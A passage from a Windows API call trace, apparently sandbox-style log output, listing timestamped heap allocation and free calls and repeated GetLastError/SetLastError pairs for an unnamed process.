hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42e60 | out: hHeap=0x22b349a0000) returned 1 [0085.381] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a421a0 | out: hHeap=0x22b349a0000) returned 1 [0085.381] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.381] GetLastError () returned 0xcb [0085.381] SetLastError (dwErrCode=0xcb) [0085.381] GetLastError () returned 0xcb [0085.381] SetLastError (dwErrCode=0xcb) [0085.382] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.383] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42ae0 [0085.383] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42660 [0085.383] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42660 | out: hHeap=0x22b349a0000) returned 1 [0085.383] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42b60 [0085.383] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x78) returned 0x22b349c5320 [0085.384] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a808d0 [0085.384] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x168) returned 0x22b349e4c40 [0085.384] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80b10 [0085.384] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80bd0 [0085.384] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a80c00 [0085.384] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a815f0 [0085.384] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a818c0 [0085.384] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81380 [0085.384] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81830 [0085.385] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81ce0 [0085.385] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81e90 [0085.385] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81aa0 [0085.385] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81650 [0085.385] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a815c0 [0085.385] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81950 [0085.385] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81c80 [0085.385] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a817a0 [0085.386] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81bc0 [0085.386] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a813b0 [0085.391] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81320 [0085.391] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81980 [0085.391] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81d70 [0085.391] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81350 [0085.391] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a818f0 [0085.391] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81bf0 [0085.392] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a813e0 [0085.392] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a819e0 [0085.392] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81740 [0085.392] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81d40 [0085.392] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81ad0 [0085.392] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81b00 [0085.392] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81d10 [0085.392] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81a10 [0085.393] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81920 [0085.393] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81410 [0085.393] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81440 [0085.393] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81e30 [0085.393] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81da0 [0085.393] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81560 [0085.393] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81470 [0085.393] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81a40 [0085.394] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a814a0 [0085.394] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a38c50 [0085.394] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e4c40 | out: hHeap=0x22b349a0000) returned 1 [0085.394] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81b60 [0085.394] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81dd0 [0085.394] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81620 [0085.394] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a38860 [0085.395] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81590 [0085.395] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81e00 [0085.395] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81b90 [0085.395] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a812c0 [0085.395] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81680 [0085.395] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a38860 | out: hHeap=0x22b349a0000) returned 1 [0085.395] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a38c50 | out: hHeap=0x22b349a0000) returned 1 [0085.395] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a816e0 [0085.396] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42b60 | out: hHeap=0x22b349a0000) returned 1 [0085.396] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42ae0 | out: hHeap=0x22b349a0000) returned 1 [0085.396] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c5320 | out: hHeap=0x22b349a0000) returned 1 [0085.396] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.396] GetLastError () returned 0xcb [0085.396] SetLastError (dwErrCode=0xcb) [0085.396] GetLastError () returned 0xcb [0085.396] SetLastError (dwErrCode=0xcb) [0085.397] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.397] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42760 [0085.397] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42a20 [0085.397] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42a20 | out: hHeap=0x22b349a0000) returned 1 [0085.397] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42860 [0085.397] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x78) returned 0x22b349c5c20 [0085.398] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a817d0 [0085.398] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x320) returned 0x22b36c458f0 [0085.398] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a812f0 [0085.398] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81b30 [0085.398] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a819b0 [0085.398] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a814d0 [0085.398] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a816b0 [0085.398] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81a70 [0085.399] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81c20 [0085.399] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81500 [0085.399] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81c50 [0085.399] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81530 [0085.399] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81e60 [0085.399] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81710 [0085.399] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81770 [0085.399] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81cb0 [0085.400] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81800 [0085.400] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81860 [0085.400] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81890 [0085.400] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82130 [0085.400] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82010 [0085.400] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82700 [0085.400] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82730 [0085.401] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82310 [0085.401] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82370 [0085.401] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82910 [0085.401] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82070 [0085.401] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82040 [0085.401] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a824f0 [0085.401] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a820a0 [0085.401] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81f50 [0085.403] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a827c0 [0085.403] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82520 [0085.403] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82880 [0085.403] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a823d0 [0085.403] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82340 [0085.404] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a824c0 [0085.404] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82a90 [0085.404] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a820d0 [0085.404] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82760 [0085.404] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82100 [0085.404] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82400 [0085.404] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82220 [0085.404] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82a00 [0085.405] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82250 [0085.405] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82610 [0085.405] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82280 [0085.405] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82160 [0085.405] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82790 [0085.405] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82550 [0085.405] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a827f0 [0085.405] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82970 [0085.406] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a821c0 [0085.406] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a822b0 [0085.406] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82820 [0085.406] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82670 [0085.406] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81ec0 [0085.406] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82850 [0085.406] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82190 [0085.407] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a829a0 [0085.407] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a828b0 [0085.407] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82a30 [0085.407] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a823a0 [0085.407] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82580 [0085.407] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a828e0 [0085.407] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a822e0 [0085.407] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82430 [0085.408] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82460 [0085.408] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a821f0 [0085.408] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82490 [0085.408] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a825b0 [0085.408] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a825e0 [0085.408] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82a60 [0085.408] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82940 [0085.409] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82640 [0085.409] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a826a0 [0085.409] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a829d0 [0085.409] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81ef0 [0085.409] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a826d0 [0085.409] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81fb0 [0085.409] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81f20 [0085.409] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81f80 [0085.410] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a81fe0 [0085.410] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82eb0 [0085.410] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82f10 [0085.410] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a83120 [0085.410] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82f40 [0085.410] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82d60 [0085.410] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a83180 [0085.410] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82ac0 [0085.411] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a83030 [0085.411] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82c10 [0085.411] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82e20 [0085.411] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a38110 [0085.411] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36c458f0 | out: hHeap=0x22b349a0000) returned 1 [0085.411] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a38aa0 [0085.411] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a38aa0 | out: hHeap=0x22b349a0000) returned 1 [0085.411] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a38110 | out: hHeap=0x22b349a0000) returned 1 [0085.411] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a83150 [0085.412] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82f70 [0085.412] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42860 | out: hHeap=0x22b349a0000) returned 1 [0085.412] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42760 | out: hHeap=0x22b349a0000) returned 1 [0085.412] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c5c20 | out: hHeap=0x22b349a0000) returned 1 [0085.412] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a7b700 | out: hHeap=0x22b349a0000) returned 1 [0085.412] GetLastError () returned 0xcb [0085.412] SetLastError (dwErrCode=0xcb) [0085.412] GetLastError () returned 0xcb [0085.412] SetLastError (dwErrCode=0xcb) [0085.413] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x1100) returned 0x22b36a7b700 [0085.413] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42120 [0085.413] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x30) returned 0x22b34a42660 [0085.413] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a42660 | out: hHeap=0x22b349a0000) returned 1 [0085.414] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x38) returned 0x22b34a42220 [0085.414] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x78) returned 0x22b349c57a0 [0085.414] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82af0 [0085.414] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x190) returned 0x22b349e4c40 [0085.414] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82d00 [0085.414] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82c40 [0085.414] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82b20 [0085.414] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82d90 [0085.414] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a831b0 [0085.415] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a83000 [0085.415] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a83060 [0085.415] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82d30 [0085.415] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82fa0 [0085.415] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82b50 [0085.415] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a830c0 [0085.415] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a83090 [0085.415] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82dc0 [0085.416] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82bb0 [0085.416] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82df0 [0085.416] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a831e0 [0085.416] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82e50 [0085.416] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82ca0 [0085.416] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a830f0 [0085.416] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82b80 [0085.417] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82be0 [0085.417] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82c70 [0085.417] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82e80 [0085.417] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82cd0 [0085.417] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82ee0 [0085.444] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a82fd0 [0085.445] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b380 [0085.445] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bdd0 [0085.445] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b440 [0085.445] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b470 [0085.445] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7be90 [0085.445] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b4a0 [0085.445] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b620 [0085.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bc80 [0085.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b9b0 [0085.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b740 [0085.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bd70 [0085.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7baa0 [0085.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bb60 [0085.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b680 [0085.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b980 [0085.447] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7bb00 [0085.447] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b9e0 [0085.447] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b350 [0085.447] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b530 [0085.447] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7be00 [0085.447] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a37030 [0085.447] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e4c40 | out: hHeap=0x22b349a0000) returned 1 [0085.448] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x88) returned 0x22b34a390d0 [0085.448] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7b8f0 [0085.448] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, 